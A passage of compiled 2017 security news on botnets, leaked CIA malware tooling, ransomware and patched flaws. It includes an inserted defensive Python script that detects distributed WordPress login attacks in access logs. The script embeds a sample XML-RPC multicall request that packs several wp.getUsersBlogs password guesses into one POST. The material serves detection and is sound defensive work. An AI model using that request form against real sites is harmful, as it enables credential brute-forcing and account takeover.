Once installed, the malware reports its successful installation to the C&C server together with a listening port, and then contacts the C&C periodically while waiting for additional instructions.

Sathurbot also uses the major search engines to harvest domains to target.

“Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.” continues ESET.

“From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.”

According to the experts, the operators of the botnet are also interested in websites running other CMSs, such as Drupal, Joomla, PHP-NUKE, phpFox and DedeCMS.

The bot sends the harvested domains to the C&C, which returns credentials to try, formatted as login:password@domain. The operators implemented a distributed WordPress password attack in which different bots try different login credentials for the same site; to avoid being blocked, each bot only tries a single login per site and then moves on to the next domain.

“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET adds.

The bot integrates the libtorrent library to act as a torrent seeder: a binary file is downloaded and a torrent is created.

The experts noticed that not all bots in the network perform all of the above functions: some only work as web crawlers, others only brute-force websites, and not every bot works as a seeder.

“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.” concludes ESET.

Experts estimate that the Sathurbot botnet has been active since at least June 2016.

“Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.”
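The log pattern ESET describes (many sources, one login attempt each, against /wp-login.php and the wp.getUsersBlogs XML-RPC method) is exactly the case that a per-IP lockout never sees. The following Python is an added example, not ESET's code and not part of the original article: it parses constructed combined-format access log lines (invented for this illustration) and flags a window in which many distinct addresses each POST once or twice to a login endpoint; it also extracts the method names from an XML-RPC body, including the inner calls of a system.multicall, since a single POST to xmlrpc.php can carry several wp.getUsersBlogs credential guesses. The thresholds, the sample lines and the multicall body are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed combined-format access log lines (invented for this illustration,
# not real server logs). Six distinct addresses each POST once to a login
# endpoint within half a minute; 203.0.113.5 browses normally; 192.0.2.77 is an
# administrator whose successful wp-login.php POST is answered with a 302.
SAMPLE_ACCESS_LOG = """\
198.51.100.10 - - [08/Apr/2017:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.11 - - [08/Apr/2017:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.12 - - [08/Apr/2017:10:00:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "Mozilla/5.0"
198.51.100.13 - - [08/Apr/2017:10:00:15 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.14 - - [08/Apr/2017:10:00:22 +0000] "POST /wp-login.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"
198.51.100.15 - - [08/Apr/2017:10:00:31 +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Apr/2017:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 15234 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Apr/2017:10:01:03 +0000] "GET /wp-content/uploads/a.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.0.2.77 - - [08/Apr/2017:10:01:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Endpoints Sathurbot's bots hit: the login form and the XML-RPC API.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_access_log(text):
    """Turn combined-format lines into dicts; lines that do not parse are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"].split("?", 1)[0],
            "status": int(m["status"]),
        })
    return events


def detect_distributed_login_attack(events, window=timedelta(minutes=10),
                                    min_sources=5, max_per_source=2):
    """Flag windows in which many distinct IPs each POST only a few times to a
    login endpoint: one guess per bot never trips a per-IP lockout, so the
    signal is the number of sources, not the attempts per source. A successful
    wp-login.php POST answers with a redirect, so 3xx responses are not counted;
    xmlrpc.php answers 200 either way and is always counted."""
    posts = sorted((e for e in events
                    if e["method"] == "POST" and e["path"] in LOGIN_PATHS
                    and not 300 <= e["status"] < 400),
                   key=lambda e: e["ts"])
    findings = []
    i = 0
    while i < len(posts):
        start = posts[i]["ts"]
        per_ip = defaultdict(int)
        j = i
        while j < len(posts) and posts[j]["ts"] - start <= window:
            per_ip[posts[j]["ip"]] += 1
            j += 1
        low_and_slow = sorted(ip for ip, n in per_ip.items() if n <= max_per_source)
        if len(low_and_slow) >= min_sources:
            findings.append({"window_start": start, "attempts": j - i,
                             "sources": low_and_slow})
            i = j            # do not report overlapping windows twice
        else:
            i += 1
    return findings


# Constructed XML-RPC body: a system.multicall wrapping two wp.getUsersBlogs
# calls, i.e. two credential guesses in a single POST to xmlrpc.php.
SAMPLE_MULTICALL_BODY = """<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value><value><string>guess1</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value><value><string>guess2</string></value></data></array></value></member></struct></value>
</data></array></value></param></params></methodCall>"""


def xmlrpc_methods(body):
    """Return every method name in an XML-RPC request body, including the inner
    calls of a system.multicall, so wp.getUsersBlogs guesses can be counted."""
    root = ET.fromstring(body)
    methods = [e.text for e in root.iter("methodName")]
    for member in root.iter("member"):
        name = member.find("name")
        value = member.find("value/string")
        if name is not None and name.text == "methodName" and value is not None:
            methods.append(value.text)
    return methods


if __name__ == "__main__":
    for f in detect_distributed_login_attack(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(f"{f['window_start']}: {f['attempts']} login POSTs from "
              f"{len(f['sources'])} sources, e.g. {f['sources'][:3]}")
    print("xmlrpc methods:", xmlrpc_methods(SAMPLE_MULTICALL_BODY))
```

Because the attack is spread across bots, the useful response is not a per-IP ban but rate-limiting the endpoint itself, disabling XML-RPC (or at least system.multicall) where nothing needs it, and feeding the flagged source list into a shared blocklist.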


WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework
8.4.2017 thehackernews BigBrothers
WikiLeaks reveals 'Grasshopper Framework' that CIA used to build Customized Windows Malware
As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonging to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft Windows systems and bypassing antivirus protection.
The leaked documents are essentially a user manual that the agency flagged as "secret" and that was supposed to be accessible only to members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, the Grasshopper framework allows agency members to easily create custom malware, depending on technical details such as which operating system and antivirus product the target is using.
The Grasshopper framework then automatically puts together the components needed to attack the target and finally delivers a Windows installer that agency members can run on a target's computer to install their custom malware payloads.
"A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."
The whistleblowing website claimed the Grasshopper toolset was designed to go undetected even by anti-virus products from the world's leading vendors, including Kaspersky Lab, Symantec and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."
"Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such piece of malware is "Carberp," a rootkit developed by Russian hackers.
"The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."
Marble revealed the source code of a secret anti-forensic framework, essentially an obfuscator or packer used by the CIA to hide the true origin of its malware.


BrickerBot Damages IoT Device Firmware

8.4.2017 securityweek IoT

Security researchers have identified a new type of cyber attack that damages Internet of Things (IoT) devices rather than ensnaring them into a botnet.

Dubbed Permanent Denial-of-Service (PDoS), the attacks can be highly damaging, resulting in the need to replace or reinstall hardware, researchers explain: security flaws are abused to destroy the firmware and/or basic functions of the system.

One of the tools used to launch such attacks is called BrickerBot, and Radware researchers observed two variants starting March 20, 2017. One of them had a short life and is now inactive, while the other continues to operate. Both have the same purpose: to compromise IoT devices and corrupt their storage.

Both bots started PDoS attempts on the same date and were discovered within one hour of each other. However, while the first showed intense activity over its short life, the second displayed lower intensity but has been more thorough in its attacks and has also been concealing its location using TOR (The Onion Router) egress nodes.

To compromise devices, BrickerBot uses Telnet brute force, a method previously associated with the Mirai botnet, which abused infected devices to launch distributed denial of service (DDoS) attacks.

Once it has successfully accessed a device, the PDoS bot performs a series of Linux commands meant to ultimately corrupt storage. Next, it also attempts to disrupt Internet connectivity and device performance, and to wipe all files on the device.

“Among the special devices targeted are /dev/mtd (Memory Technology Device - a special device type to match flash characteristics) and /dev/mmc (MultiMediaCard - a special device type that matches memory card standard, a solid-state storage medium),” Radware researchers reveal.

The attack specifically targets Linux/BusyBox-based IoT devices that have the Telnet port open and exposed publicly on the Internet. These are the same type of devices that Mirai and related IoT botnets have been targeting.

The recorded PDoS attempts originated from a limited number of IP addresses worldwide, with all devices exposing port 22 (SSH) and running an older version of the Dropbear SSH server. These were identified as Ubiquiti network devices.

The security researchers also identified a second type of PDoS attempts, with a different command signature, which hid their source IP addresses behind TOR nodes. Still ongoing, these attacks attempt to brute-force the Telnet login using the root/root and root/vizxv username-password pairs, use more thorough commands, and target a much broader range of storage devices.

These attacks don’t use 'busybox' but attempt both 'dd' and 'cat', whichever is available on the breached device, the researchers say. In the end, these attacks also attempt to remove the default gateway, wipe the device, and disable TCP timestamps. With the help of extra commands, the attackers attempt to flush all iptables firewall and NAT rules and add a rule to drop all outgoing packets.


WikiLeaks leaked files on the Grasshopper framework, a CIA Tool for creating customized malware installers
8.4.2017 securityaffairs BigBrothers 

WikiLeaks has published a new batch of 27 documents detailing the Grasshopper framework, used by CIA agents to create custom installers for Windows malware.
WikiLeaks continues to disclose documents from the CIA Vault 7 archive: on Friday it published a new batch of 27 documents detailing a framework, dubbed Grasshopper, allegedly used to create custom installers for Windows malware.

The Grasshopper framework allows CIA operators to build a custom payload, run it and analyze the results of the execution.

The leaked documents make up a user guide classified as “secret” that was available to CIA cyber spies.

“The documents WikiLeaks publishes today provide insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.


The Grasshopper manual specifies that the dropper should be loaded and executed only in memory; the framework allows operators to create custom malware able to compromise the target system while bypassing the antivirus it is running.

“A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,” reads the manual. “Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.”

Each executable generated with the Grasshopper framework contains one or more installers.

The framework offers operators various persistence mechanisms and lets them define a series of rules that must be met before an installation is launched. The rules allow attackers to target specific systems by their technical details (e.g. 32-bit or 64-bit architecture, OS version).

“An executable may have a global rule that will be evaluated before execution of any installers. If a global rule is provided and evaluates to false the executable aborts operation” continues the manual.

One of the persistence mechanisms described in the user guide is called Stolen Goods; essentially, the CIA reused mechanisms implemented in malicious code that crooks use in the wild.

For example, the CIA has modified some components of the popular Carberp rootkit.

“The persistence method and parts of the installer were taken and modified to fit our needs,” reads a leaked document. “A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.”

Another persistence mechanism leverages the Windows Update Service, which loads a series of DLLs specified in the registry on every system boot or every 22 hours, so that the payload is executed each time.

WikiLeaks has already leaked the “Year Zero” batch which contains detailed info on the CIA hacking exploits and the “Dark Matter” batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs. A few days ago, WikiLeaks published the third batch called “Marble,” a collection of files describing the CIA anti-forensics tool dubbed Marble framework.


Sathurbot Botnet Targets WordPress Accounts

8.4.2017 securityweek BotNet
A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.

Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.

Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.

Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.

“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.

The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.

Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results and uses it for the next round of search queries. The second set of search results is used to harvest domain names.

The threat selects only the domains created using WordPress, but it appears to be interested in the Drupal, Joomla, PHP-NUKE, phpFox and DedeCMS frameworks as well. The malware sends the harvested domains to the C&C.

The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.

“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.

The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.

“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.

Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.


WikiLeaks Details CIA Tool for Creating Windows Malware Installers

8.4.2017 securityweek BigBrothers
WikiLeaks leaks more alleged CIA hacking tools

WikiLeaks on Friday published 27 documents detailing a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to create custom installers for malware designed to target Windows systems.

The framework, dubbed “Grasshopper,” has been described as a tool that allows operators to build a custom installation executable, run that executable, and evaluate the results of the execution. The Grasshopper user guide specifies that the dropper should be loaded and executed only in memory.

Leaked documents show that Grasshopper provides various persistence mechanisms and allows users to define a series of conditions that need to be met before an installation is launched. These rules can help determine if the targeted device is running the correct version of Windows and if certain security products are present.

One of the persistence mechanisms highlighted by WikiLeaks involves the Windows Update Service, which can be abused to ensure that the payload is executed on every system boot or every 22 hours, when the service loads a series of DLLs specified in the registry.

WikiLeaks also highlighted Stolen Goods, a Grasshopper persistence module that borrows code from the notorious Carberp banking Trojan, whose source code was leaked a few years ago. The authors of Stolen Goods, however, pointed out that only some parts of the Carberp code were taken and those were heavily modified.

“The documents WikiLeaks publishes today provide insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.

This is the third round of files made public by WikiLeaks as part of the dump called Vault 7. The organization claims to possess numerous exploits allegedly used by the CIA and it has offered to share them with affected tech companies, but it appears that many firms are not willing to comply with WikiLeaks’ demands to obtain the information.

An analysis of the information made public to date has shown that many of the vulnerabilities have already been patched by security firms and tech giants such as Apple and Google. Cisco did admit finding a critical vulnerability affecting many of its switches following an analysis of the Vault 7 files.


Android Trojan Uses Sandbox to Evade Detection

8.4.2017 securityweek Android
The Triada malware, said last year to be the most advanced mobile threat, recently boosted its detection evasion capabilities with the adoption of sandbox technology, Avast security researchers reveal.

Detailed for the first time in March last year, the malware was observed leveraging the Zygote process to hook all applications on a device. Featuring a modular architecture, the Trojan was mainly designed to redirect financial SMS transactions to buy additional content or steal money from the user.

Recently, Triada started using the open source sandbox DroidPlugin, which is designed to dynamically load and run an app without actually installing it. With the help of this sandbox, Triada loads malicious APK plugins, thus running them without having to install them on the device. Because of this practice, anti-virus solutions have a hard time detecting the malware, because its malicious components are not stored in the host app.

The malware is being distributed with the help of social engineering tactics, by deceiving victims into downloading the malware. Once installed, the threat hides its icon from the phone’s desktop and starts stealing personal information in the background, without ever alerting the victim.

While the earliest variant of the malware didn’t use DroidPlugin, a new variant that emerged in November started integrating it, Avast researchers explain. Around the same time the new Triada variant emerged, the malware author reportedly submitted an issue to DroidPlugin to report an out-of-memory bug.

According to Avast, the malware disguises itself as Wandoujia, a famous Android app store in China. Furthermore, it was observed hiding all of its malicious APK plugins in the asset directory, for DroidPlugin to run.

“Each of these plugins has its own dedicated malicious action to spy on the victim, including file stealing, radio monitoring, and more. One of the plugins communicates with a remote command and control (C&C) server, which instructs which activities should be carried out. These are then carried out by the other APKs,” the researchers say.

Avast also explains that the malware developer didn’t integrate the malicious plugins into the application itself, but instead opted to use the DroidPlugin sandbox to dynamically load and run them, specifically to bypass antivirus detection. The host application contains no malicious actions, so antivirus solutions won’t detect and block it.

Only a couple of cases of malware using sandboxes for their nefarious purposes have been observed so far, but more instances might emerge. “While it can be convenient to use a sandbox to run an app without installing it, sandboxes can also be used maliciously by malware,” Avast concludes.


Joke "rensenWare" Ransomware Challenges Gamers

8.4.2017 securityweek Virus
Researchers have discovered a strange new ransomware called 'rensenWare'. Rather than demanding money for decryption, it requires the victim to score "over 0.2 billion" playing "TH12 -- Undefined Fantastic Object". Victims are told that the score will be monitored, and decryption will be automatic on success, provided there is no attempt to cheat.

Analysis by Lawrence Abrams subsequently concluded that rensenWare is not coded effectively enough to be serious ransomware. "As the developer is not looking to generate revenue from this ransomware," he concluded, "this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed."

This seems to have been confirmed by the author, Tvple Eraser, on Twitter: "Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day". rensenWare seems to have been a bit of fun by a gamer/hacker, and that's all.

That seems to be the feeling of the security industry. "Never say never, but I don't think we'll see much copycat efforts spawning from rensenware," Sean Sullivan, Security Advisor at F-Secure told SecurityWeek. Nevertheless, he added, "There was some interesting 'Kirk' ransomware the other week (and Spock was the cure). So I think we'll see continued amounts of 'creative' themes, but they'll be asking for Bitcoin, not high scores."

But hard-core gaming has its own sub-culture. SecurityWeek approached two hard-cores. One responded, "Oh, yes, most definitely this will provoke some copycat jokes and viruses." This is worth watching, because 'vendettas' among gamers are not unknown.

The other added, "In retrospect, I'm surprised no-one has done a ransomware like this already." He added that there's not much 'buzz' on the gaming scene yet, possibly because it's so new; but continued "I'd say there's a reasonable chance of it sparking a new 'subgenre' of ransomware viruses (challengeware?) and I can even see a toned-down version of it being used in viral marketing campaigns."

Right now, the basic concept developed by Tvple Eraser is not a threat -- but it has the potential to become one, or at least a nuisance. In fact, it could already be described as a nuisance. Googling 'rensenware' will generate a string of websites providing information on a threat that arguably does not exist, but all offering to remove it (and other ransomware/viruses) with a simple download.

That download is invariably SpyHunter. SpyHunter used to be thought of as 'rogueware'. It has fought this description vigorously, including in the courts. It has sued both BleepingComputer after a poor review, and Malwarebytes for classifying it as a PUP (potentially unwanted program). SecurityWeek asked Malwarebytes if it still treats SpyHunter as a PUP.

"Enigma's SpyHunter?" replied malware intelligence researcher Pieter Arntz; "Yes, definitely."


Vulnerability in Apple Music for Android could be exploited to steal user data
7.4.2017 securityaffairs Apple

Apple fixed a vulnerability tracked as CVE-2017-2387 in the Apple Music for Android that could allow attackers to launch MitM attacks on the application.
The update released by Apple for the Apple Music application for Android fixes a certificate validation issue that can be exploited by an attacker to run MitM attacks and intercept user data.

Version 2.0 of Apple Music for Android also brings new features and fixes the vulnerability tracked as CVE-2017-2387.

According to Google Play, version 2.0 of Apple Music for Android has between 10 and 50 million installs.

The flaw CVE-2017-2387 was discovered by David Coomber of Info-Sec.CA in August 2016. The vulnerability was affecting Apple Music 1.2.1 and earlier versions of the Android app.

“The Apple Music Android application (version 1.2.1 and below), does not validate the SSL certificates it receives when connecting to the mobile application login and payment servers.” reads the security advisory published by Coomber.

“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently. Sensitive information could be captured by an attacker without the user’s knowledge.”

According to the expert, the app did not validate the SSL certificates presented while connecting to the login and payment servers. The attacker can present a forged SSL certificate that will be accepted by the application without raising any alert.

Unfortunately, this kind of issue is quite common in mobile applications and represents a serious threat to user privacy.


Philadelphia Ransomware, a new threat targets the Healthcare Industry
7.4.2017 securityaffairs Virus

“Philadelphia” Ransomware Targets Healthcare Industry
Security experts from Forcepoint have discovered a new strain of ransomware dubbed Philadelphia that is targeting organizations in the healthcare industry.

The Philadelphia ransomware is a variant of the Stampado ransomware, a very cheap malware offered for sale on the Dark Web since June 2016 at just 39 USD for a lifetime license.

Last month the popular expert Brian Krebs discovered an ad for Philadelphia on YouTube.

According to the researchers, the Philadelphia ransomware is distributed via spear-phishing emails sent to hospitals. The messages contain a shortened URL that points to a personal storage site that serves a weaponized DOCX file containing the targeted healthcare organization’s logo.

The file includes three document icons apparently related to patient information, which attempt to trick victims into clicking on them.

If the victim clicks on an icon, a JavaScript file is triggered that downloads and executes a variant of the Philadelphia ransomware.

This tactic was already used to infect a hospital from Oregon and Southwest Washington.

“However, it appears that amateur cybercriminals have also started to shift towards this trend in the form of an off-the-shelf ransomware aimed at a healthcare organization in the United States.” reads the analysis published by ForcePoint.

“In this attack, a shortened URL, which we believe was sent through a spear-phishing email, was used as a lure to infect a hospital from Oregon and Southwest Washington. Once a user clicks on the link, the site redirects to a personal storage site to download a malicious DOCX file. This document contains the targeted healthcare organization’s logo and a signature of a medical practitioner from that organization as bait.”

“Three document icons pertaining to patient information are present in the file. These icons all point to a malicious JavaScript,” the analysis continues. “Once the user double-clicks any of the icons, the Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.”

Once the ransomware has infected the system, it contacts the C&C server and sends various details about the target machine, including operating system, username, country, and system language. The C&C server responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

The Philadelphia ransomware uses AES-256 to encrypt files; when the operation is complete it displays a ransom demand of 0.3 Bitcoin to the victim.

The analysis of the malicious code revealed a couple of interesting things:

The encrypted JavaScript contained the string “hospitalspam” in its directory path.
The ransomware C&C also contained “hospital/spam” in its path.

The presence of these words suggests the attackers are specifically targeting hospitals using spear-phishing emails.

“Ransomware-as-a-service (RaaS) platforms such as Philadelphia continue to attract would-be cybercriminals to take part in the ransomware business,” concluded Forcepoint. “Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector.”


IoT Amnesia Botnet puts at risk hundreds of thousands of DVRs due to unpatched flaw
7.4.2017 securityaffairs IoT

Security experts at Palo Alto Networks have discovered a new Linux/IoT botnet dubbed Amnesia botnet that has been targeting digital video recorders (DVRs).
Amnesia exploited an unpatched remote code execution vulnerability that was disclosed more than one year ago by security researcher Rotem Kerner.

“fraudsters are adopting new tactics in order to attack retailers. This new attack vector is to compromise DVR boxes, which is the heart component of any CCTV system. This was allowing them to achieve two goals at once-

Verify a targeted host actually belongs to a retailer.
Get a foothold inside the local network, one step closer to the POS station.
” wrote Kerner.

Kerner reported the flaw in March 2016, but after a year opted to publicly reveal his discovery because the vendor ignored him.

According to Palo Alto Networks, Amnesia is a variant of the Tsunami botnet, a downloader/IRC bot backdoor used in the criminal ecosystem to launch DDoS attacks. The Amnesia botnet targets embedded systems, particularly DVRs manufactured by the Chinese company TVT Digital, whose devices are currently sold under more than 70 brands worldwide.

The security vulnerability discovered by the researcher is still unpatched and, according to the results of an Internet scan conducted by Palo Alto Networks, there are roughly 227,000 vulnerable DVR devices worldwide.

“Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed.” states the analysis published by PaloAlto Networks.

The Amnesia botnet was built exploiting the remote code execution vulnerability that allowed the attackers to take complete control of the devices.

A different analysis conducted with the Censys search engine revealed more than 700,000 IP addresses.

“Additionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on Internet that are likely produced by TVT Digital. We also searched the keyword on Shodan.io and on Censys.io. They reported about 50,000 and about 705,000 IP addresses respectively.” states PaloAlto Networks.

The per-country counts from that scan (top 20):

1. Taiwan 47170
2. United States 44179
3. Israel 23355
4. Turkey 11780
5. India 9796
6. Malaysia 9178
7. Mexico 7868
8. Italy 7439
9. Vietnam 6736
10. United Kingdom 4402
11. Russia 3571
12. Hungary 3529
13. France 3165
14. Bulgaria 3040
15. Romania 2783
16. Colombia 2616
17. Egypt 2541
18. Canada 2491
19. Iran 1965
20. Argentina 1748

Experts believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to elude malware analysis sandboxes.

“Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system.” continues the analysis. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”

Experts at Palo Alto Networks believe the Amnesia botnet has the potential to become one of the major botnets in the threat landscape and could be used for large-scale attacks.

For further information on Amnesia, take a look at the technical report, which also includes IoCs.


Critical Vulnerabilities Patched in QNAP Storage Devices

7.4.2017 securityweek Vulnerebility
QNAP recently patched roughly 20 vulnerabilities in its network-attached storage (NAS) products, including weaknesses that can be exploited to take control of affected devices.

According to an advisory published by the vendor last month, the flaws were patched with the release of version 4.2.4 build 20170313 of QTS, the operating system running on QNAP NAS devices.

The update patches privilege escalation, command injection, SQL injection, cross-site scripting (XSS), clickjacking, credentials management, access bypass and various memory corruption vulnerabilities.

Three of the command injection flaws were reported to QNAP by Harry Sintonen of F-Secure, who on Thursday published an advisory detailing his findings. The expert said he informed the vendor of the vulnerabilities in late February.

The security holes discovered by Sintonen, tracked as CVE-2017-6361, CVE-2017-6360 and CVE-2017-6359, can be exploited by authenticated or unauthenticated attackers to execute arbitrary commands on vulnerable devices. Exploitation of the unauthenticated command injection flaws can be automated in attacks aimed at devices that are connected to the Internet.

According to Sintonen, the flaws allow an attacker to gain root access to a device and read or modify all the data stored on it.

Researchers Pasquale Fiorillo and Guido Oricchio also published an advisory detailing a privilege escalation vulnerability (CVE-2017-5227) that was patched with the release of QTS 4.2.4.

The experts discovered that a local user can access a configuration file that contains a poorly encrypted Windows domain administrator password. The password is stored in the configuration file if the NAS device has joined an Active Directory domain, researchers said.

A couple of researchers from Salesforce have also been credited for finding security holes patched in QTS 4.2.4. The flaws found by Fiorillo, Oricchio and Sintonen are the only ones that have been assigned CVE identifiers.

It’s important that users install the update as soon as possible since malware that specifically targets QNAP devices is not unheard of. A few years ago, researchers warned that a worm had been exploiting the ShellShock vulnerability to plant backdoors on NAS devices from QNAP.


China-Linked Hackers Target U.S. Trade Group

7.4.2017 securityweek Cyber
A threat actor linked to China hijacked the website of a prominent U.S. trade association in an effort to deliver reconnaissance malware to individuals who accessed certain web pages.

Fidelis Cybersecurity published a report detailing the campaign on Thursday, just hours before a meeting between U.S. President Donald Trump and his Chinese counterpart, Xi Jinping.

The company noticed in late February that the website of the National Foreign Trade Council (NFTC) had been hacked and set up to serve malware in what is known as a watering hole attack, or a strategic web compromise. Experts believe the attack ended by March 2, when links injected into the NFTC website had been removed.

Evidence uncovered by investigators led them to believe that the attack was conducted by a China-linked cyber espionage group known as APT10, MenuPass and Stone Panda. Fidelis has dubbed the campaign Operation TradeSecret.

According to researchers, the hackers set up certain web pages of the NFTC website to serve a reconnaissance framework known as Scanbox. The tool has been used for several years, including in attacks aimed at U.S. organizations and the Uyghur population in China.

Scanbox has various plugins that allow attackers to collect information about the infected system and the software installed on it, and log keystrokes from the web browser. The harvested data can then be used to launch further attacks against the targeted individuals.

In the case of the NFTC, whose board of directors includes some of the largest private sector companies in the United States, APT10 targeted only specific web pages. One of them was a registration page for a board of directors meeting, which suggests that people or organizations expected to attend the meeting had been targeted.

“All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report,” warned Fidelis. “Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.”

